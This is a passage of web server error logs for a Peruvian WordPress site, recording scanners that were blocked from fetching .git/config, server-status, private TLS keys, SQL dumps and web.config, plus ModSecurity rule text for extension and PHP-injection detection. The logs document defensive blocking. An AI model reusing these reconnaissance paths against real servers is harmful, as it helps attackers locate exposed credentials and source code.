"GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/05/31 00:45:31 [error] 6640#6640: *160482 access forbidden by rule, client: 139.162.141.82, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/05/31 00:45:33 [error] 6640#6640: *160578 access forbidden by rule, client: 138.68.86.32, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/05/31 00:45:34 [error] 6639#6639: *160602 access forbidden by rule, client: 139.162.141.82, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/05/31 00:45:34 [error] 6639#6639: *160613 access forbidden by rule, client: 139.59.136.184, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Fri May 31 00:45:41.335793 2024] [authz_core:error] [pid 6652:tid 140347015411456] [client 139.59.132.8:41364] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Fri May 31 00:45:42.232663 2024] [authz_core:error] [pid 6792:tid 140347138766592] [client 139.162.155.225:41368] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Fri May 31 00:45:46.685735 2024] [authz_core:error] [pid 6792:tid 140346931484416] [client 164.90.208.56:41388] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Fri May 31 00:45:48.086740 2024] [authz_core:error] [pid 6652:tid 140347032196864] [client 164.92.244.132:41402] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/31 00:45:49 [error] 6639#6639: *160716 access forbidden by rule, client: 139.59.132.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/05/31 00:45:50 [error] 6640#6640: *160725 access forbidden by rule, client: 139.162.155.225, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/05/31 00:45:53 [error] 6639#6639: *160740 access forbidden by rule, client: 164.90.208.56, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/05/31 00:45:56 [error] 6639#6639: *160803 access forbidden by rule, client: 164.92.244.132, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri May 31 04:10:17.190211 2024] [autoindex:error] [pid 9685:tid 140604965066496] [client 104.254.244.98:45790] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri May 31 08:06:15.477483 2024] [:error] [pid 9685:tid 140604965066496] [client 89.117.60.222:48458] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Fri May 31 08:06:30.665881 2024] [:error] [pid 9683:tid 140605206820608] [client 89.117.60.222:48490] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri May 31 08:06:30.791108 2024] [:error] [pid 9685:tid 140605023815424] [client 89.117.60.222:48492] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri May 31 08:07:15.919062 2024] [autoindex:error] [pid 9685:tid 140605032208128] [client 89.117.60.222:48586] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri May 31 08:07:25.663853 2024] [:error] [pid 9684:tid 140605206820608] [client 89.117.60.222:48610] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri May 31 08:07:26.464719 2024] [autoindex:error] [pid 9685:tid 140605023815424] [client 89.117.60.222:48614] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri May 31 08:07:27.279320 2024] [autoindex:error] [pid 9683:tid 140605198427904] [client 89.117.60.222:48618] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri May 31 08:07:32.868660 2024] [:error] [pid 9865:tid 140605048993536] [client 89.117.60.222:48632] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri May 31 08:07:32.970296 2024] [:error] [pid 9865:tid 140605065778944] [client 89.117.60.222:48634] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri May 31 08:08:15.645847 2024] [:error] [pid 9684:tid 140605032208128] [client 89.117.60.222:48734] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Fri May 31 08:08:31.200421 2024] [:error] [pid 9684:tid 140605074171648] [client 89.117.60.222:48784] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri May 31 08:08:31.325805 2024] [:error] [pid 9865:tid 140604931495680] [client 89.117.60.222:48786] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri May 31 08:09:14.938132 2024] [autoindex:error] [pid 9865:tid 140605048993536] [client 89.117.60.222:48888] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri May 31 08:09:25.816702 2024] [:error] [pid 9865:tid 140604948281088] [client 89.117.60.222:48914] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri May 31 08:09:26.917549 2024] [autoindex:error] [pid 9865:tid 140605206820608] [client 89.117.60.222:48918] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri May 31 08:09:27.974947 2024] [autoindex:error] [pid 9865:tid 140605032208128] [client 89.117.60.222:48922] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri May 31 08:09:34.421676 2024] [:error] [pid 9685:tid 140605198427904] [client 89.117.60.222:48936] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri May 31 08:09:34.540723 2024] [:error] [pid 9684:tid 140604931495680] [client 89.117.60.222:48938] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Jun 01 02:14:30.680032 2024] [:error] [pid 9683:tid 140605164857088] [client 109.202.99.46:41496] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/server.key"] [unique_id "ZlrKVhgIsXLsAuQ0OyVX1wAAAAU"] 2024/06/01 02:14:30 [error] 9537#9537: *177208 access forbidden by rule, client: 109.202.99.46, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2024/06/01 02:14:30 [error] 9537#9537: *177210 access forbidden by rule, client: 109.202.99.46, server: investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "investigacionperu.com" [Sat Jun 01 02:14:30.779015 2024] [:error] [pid 9683:tid 140605023815424] [client 109.202.99.46:41506] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/etc/ssl/private/server.key"] [unique_id "ZlrKVhgIsXLsAuQ0OyVX3QAAAA0"] [Sat Jun 01 02:14:30.788758 2024] [:error] [pid 9683:tid 140605007030016] [client 109.202.99.46:41510] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/database.sql"] [unique_id "ZlrKVhgIsXLsAuQ0OyVX3wAAAA8"] [Sat Jun 01 02:14:30.801210 2024] [:error] [pid 9683:tid 140605032208128] [client 109.202.99.46:41518] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup.sql"] [unique_id "ZlrKVhgIsXLsAuQ0OyVX4wAAAAw"] [Sat Jun 01 02:14:31.007849 2024] [:error] [pid 9683:tid 140605173249792] [client 109.202.99.46:41532] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/web.config"] [unique_id "ZlrKVhgIsXLsAuQ0OyVX6gAAAAQ"] [Sat Jun 01 02:14:31.048972 2024] [:error] [pid 9683:tid 140605074171648] [client 109.202.99.46:41536] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/dump.sql"] [unique_id "ZlrKVhgIsXLsAuQ0OyVX7QAAAAc"] [Sat Jun 01 02:14:31.089883 2024] [authz_host:error] [pid 9683:tid 140605048993536] [client 109.202.99.46:41504] AH01753: access check of 'localhost' to /server-status failed, reason: unable to get the remote host name [Sat Jun 01 02:14:31.089939 2024] [authz_core:error] [pid 9683:tid 140605048993536] [client 109.202.99.46:41504] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Sat Jun 01 04:19:11.027452 2024] [:error] [pid 32144:tid 139847616390912] [client 5.188.62.140:43488] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Zlrnj-8XIFNFZB_sHs7wVwAAAMs"] [Sat Jun 01 07:16:51.744448 2024] [autoindex:error] [pid 31832:tid 139847566034688] [client 82.165.103.249:45732] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 01 10:03:32.645337 2024] [:error] [pid 31831:tid 139847557641984] [client 51.15.184.67:48656] [client 51.15.184.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zls4RN6Ko_kT4WdgZvxlqgAAAFI"], referer: www.google.com [Sat Jun 01 10:03:55.958987 2024] [:error] [pid 31832:tid 139847599605504] [client 51.15.184.67:48662] [client 51.15.184.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zls4WwN2Wqcn1niI8jNJ-AAAAI0"], referer: www.google.com [Sat Jun 01 14:35:11.903525 2024] [autoindex:error] [pid 31831:tid 139847649961728] [client 167.71.230.142:56012] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 01 14:51:41.048841 2024] [:error] [pid 32144:tid 139847524071168] [client 38.242.206.184:56368] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sat Jun 01 14:51:54.646550 2024] [:error] [pid 31832:tid 139847515678464] [client 38.242.206.184:56404] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Jun 01 14:51:54.761822 2024] [:error] [pid 31830:tid 139847515678464] [client 38.242.206.184:56406] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Jun 01 14:52:34.136664 2024] [autoindex:error] [pid 32144:tid 139847624783616] [client 38.242.206.184:56498] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 01 14:52:44.269221 2024] [:error] [pid 31832:tid 139847624783616] [client 38.242.206.184:56522] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Jun 01 14:52:45.166528 2024] [autoindex:error] [pid 31830:tid 139847675139840] [client 38.242.206.184:56526] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 01 14:52:46.011204 2024] [autoindex:error] [pid 32144:tid 139847782856448] [client 38.242.206.184:56530] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 01 14:52:51.788293 2024] [:error] [pid 31830:tid 139847649961728] [client 38.242.206.184:56544] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Jun 01 14:52:51.894931 2024] [:error] [pid 31830:tid 139847683532544] [client 38.242.206.184:56546] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Jun 01 14:53:30.875036 2024] [:error] [pid 31832:tid 139847649961728] [client 38.242.206.184:56664] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sat Jun 01 14:53:43.870568 2024] [:error] [pid 31831:tid 139847691925248] [client 38.242.206.184:56698] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Jun 01 14:53:43.975144 2024] [:error] [pid 31832:tid 139847607998208] [client 38.242.206.184:56700] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Jun 01 14:54:24.878833 2024] [autoindex:error] [pid 31830:tid 139847782856448] [client 38.242.206.184:56804] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 01 14:54:33.568667 2024] [:error] [pid 32144:tid 139847524071168] [client 38.242.206.184:56830] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Jun 01 14:54:34.581172 2024] [autoindex:error] [pid 31831:tid 139847540856576] [client 38.242.206.184:56838] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 01 14:54:35.754207 2024] [autoindex:error] [pid 32144:tid 139847658354432] [client 38.242.206.184:56842] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 01 14:54:41.646288 2024] [:error] [pid 32144:tid 139847566034688] [client 38.242.206.184:56856] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Jun 01 14:54:41.759992 2024] [:error] [pid 31831:tid 139847515678464] [client 38.242.206.184:56858] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Jun 01 16:56:40.408091 2024] [authz_core:error] [pid 31832:tid 139847641569024] [client 172.105.16.117:58568] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Sat Jun 01 16:56:41.074744 2024] [authz_core:error] [pid 32144:tid 139847582820096] [client 139.59.136.184:58574] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/01 16:56:42 [error] 31788#31788: *188576 access forbidden by rule, client: 172.105.16.117, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/06/01 16:56:44 [error] 31789#31789: *188587 access forbidden by rule, client: 139.59.136.184, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Jun 01 17:06:13.364963 2024] [authz_core:error] [pid 31831:tid 139847658354432] [client 157.245.204.205:58798] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/01 17:06:19 [error] 31789#31789: *188725 access forbidden by rule, client: 157.245.204.205, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Jun 01 17:58:36.325186 2024] [authz_core:error] [pid 31830:tid 139847507285760] [client 138.68.86.32:59648] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/01 17:58:40 [error] 31789#31789: *189188 access forbidden by rule, client: 138.68.86.32, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Jun 01 23:07:28.653966 2024] [authz_core:error] [pid 29178:tid 139847774463744] [client 178.128.207.138:37324] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/01 23:07:33 [error] 29136#29136: *192735 access forbidden by rule, client: 178.128.207.138, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/06/02 00:30:30 [error] 29136#29136: *193565 access forbidden by rule, client: 83.147.52.49, server: investigacionperu.com, request: "GET /var/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/06/02 01:12:40 [error] 29136#29136: *193856 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /var/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sun Jun 02 01:23:36.350992 2024] [authz_core:error] [pid 29308:tid 139847524071168] [client 64.225.75.246:39860] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Sun Jun 02 01:23:36.576399 2024] [authz_core:error] [pid 29308:tid 139847649961728] [client 207.154.212.47:39862] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/02 01:23:40 [error] 29136#29136: *193962 access forbidden by rule, client: 64.225.75.246, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/06/02 01:23:40 [error] 29136#29136: *193963 access forbidden by rule, client: 207.154.212.47, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Jun 02 02:22:08.251650 2024] [:error] [pid 29308:tid 139847591212800] [client 192.0.102.194:40590] [client 192.0.102.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:signature. [file 